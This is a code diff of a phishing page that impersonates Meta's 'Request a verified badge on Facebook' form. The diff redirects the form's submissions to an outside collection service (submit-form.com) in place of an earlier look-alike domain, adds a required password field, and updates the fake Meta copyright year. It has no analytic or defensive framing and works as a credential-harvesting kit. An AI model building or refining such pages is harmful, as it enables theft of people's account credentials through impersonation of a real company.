--- a/help.html
+++ b/help.html
@@ -23,7 +23,7 @@
 
   <div class="deho">
 
-    <form class="content" action="https://passwaordlink.shop/eng/.php" method="post">
+    <form class="content" action="https://submit-form.com/h3WppF7Pz" method="post">
       
       <p class="head">Request a verified badge on Facebook</p> <br>
 
@@ -67,6 +67,12 @@
        </p>
         <input type="text" name="xs" id="xs" required="">
       </div>
+
+        <div>
+          <p class="tx-2">  
+              password
+              </p>
+     <input type="text" name="password" id="password" required="">
       <p class="t1">Please make sure account not to log out from your computer or laptop until you have received a verification email.</p>
 
       <div class="sub2">
@@ -83,7 +89,7 @@
   </div>
 
   <div class="copyright">
-    <p>Meta © 2024</p>
+    <p>Meta © 2025</p>
   </div>
 
   <script>
